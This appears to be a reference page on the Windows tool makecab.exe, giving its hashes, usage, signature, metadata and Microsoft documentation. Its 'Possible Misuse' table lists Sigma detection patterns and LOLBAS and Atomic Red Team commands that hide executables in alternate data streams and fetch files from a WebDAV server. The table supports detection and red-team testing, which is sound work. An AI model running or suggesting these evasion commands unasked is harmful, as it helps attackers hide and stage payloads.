makecab.exe
- File Path:
C:\WINDOWS\system32\makecab.exe - Description: Microsoft Cabinet Maker
Hashes
| Type | Hash |
|---|---|
| MD5 | 38EA55B97BF891C6928FC8501C5F63B2 |
| SHA1 | 623A906E269804D4A4E4D4D9E3DD3FDA54D34AB3 |
| SHA256 | 84146980ABA210FB46FA4C8436254ABDA1E3ED29EFACBEA06DEA693086FBA983 |
| SHA384 | D5EA3EE7420A195F18B44339EF6318926F4BD0997EEBCBF78873CC2AFDF2F93245B3612168619B7BB1CFED83C70A8BB7 |
| SHA512 | 18CFAC676C2AD3E28EEF45FD6E69247746F95B5917945D3CBC8EF84F04CEA748FFDBDC11FD37F51B40D2A05475445A4B994257858D1DBACD9A9F615ECB7CDA14 |
| SSDEEP | 3072:J9rHGCeQg2HZUy25cZmzQC2BMhZED6hXiwvY3:JZmCFL72KZGEqSt |
| IMP | A9326A6F3C34256D97D8CD7972ACC242 |
| PESHA1 | DCD65B95259F921E11EA7B31F7CBF1D9F36CB868 |
| PE256 | 5E75A2BF75785A847A923127564BE48165F3D7CFF833EA75F70E18D65E71E183 |
Runtime Data
Usage (stdout):
Cabinet Maker - Lossless Data Compression Tool
MAKECAB [/V[n]] [/D var=value ...] [/L dir] source [destination]
MAKECAB [/V[n]] [/D var=value ...] /F directive_file [...]
source File to compress.
destination File name to give compressed file. If omitted, the
last character of the source file name is replaced
with an underscore (_) and used as the destination.
/F directives A file with MakeCAB directives (may be repeated). Refer to
Microsoft Cabinet SDK for information on directive_file.
/D var=value Defines variable with specified value.
/L dir Location to place destination (default is current directory).
/V[n] Verbosity level (1..3).
Loaded Modules:
| Path |
|---|
| C:\WINDOWS\System32\KERNEL32.DLL |
| C:\WINDOWS\System32\KERNELBASE.dll |
| C:\WINDOWS\system32\makecab.exe |
| C:\WINDOWS\SYSTEM32\ntdll.dll |
Signature
- Status: Signature verified.
- Serial:
33000002ED2C45E4C145CF48440000000002ED - Thumbprint:
312860D2047EB81F8F58C29FF19ECDB4C634CF6A - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: makecab.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 5.00 (WinBuild.160101.0800)
- Product Version: 5.00
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/73
- VirusTotal Link: https://www.virustotal.com/gui/file/84146980aba210fb46fa4c8436254abda1e3ed29efacbea06dea693086fba983/detection
Possible Misuse
The following table contains possible examples of makecab.exe being misused. While makecab.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | sysmon_suspicious_remote_thread.yml | - '\makecab.exe' |
DRL 1.0 |
| sigma | proc_creation_win_alternate_data_streams.yml | - 'makecab ' |
DRL 1.0 |
| sigma | proc_creation_win_apt_hafnium.yml | Image\|endswith: '\makecab.exe' |
DRL 1.0 |
| LOLBAS | Makecab.yml | Name: Makecab.exe |
|
| LOLBAS | Makecab.yml | - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab |
|
| LOLBAS | Makecab.yml | - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab |
|
| LOLBAS | Makecab.yml | - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab |
|
| LOLBAS | Makecab.yml | - Path: C:\Windows\System32\makecab.exe |
|
| LOLBAS | Makecab.yml | - Path: C:\Windows\SysWOW64\makecab.exe |
|
| LOLBAS | Makecab.yml | - IOC: Makecab retrieving files from Internet |
|
| LOLBAS | Makecab.yml | - IOC: Makecab storing data into alternate data streams |
|
| atomic-red-team | T1564.004.md | makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab | MIT License. © 2018 Red Canary |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
makecab
Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
Package existing files into a cabinet (.cab) file.
[!NOTE] This command is the same as the diantz command.
Syntax
makecab [/v[n]] [/d var=<value> ...] [/l <dir>] <source> [<destination>]
makecab [/v[<n>]] [/d var=<value> ...] /f <directives_file> [...]
Parameters
| Parameter | Description |
|---|---|
<source> |
File to compress. |
<destination> |
File name to give compressed file. If omitted, the last character of the source file name is replaced with an underscore (_) and used as the destination. |
/f <directives_file> |
A file with makecab directives (may be repeated). |
/d var=<value> |
Defines variable with specified value. |
/l <dir> |
Location to place destination (default is current directory). |
/v[<n>] |
Set debugging verbosity level (0=none,…,3=full). |
| /? | Displays help at the command prompt. |
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.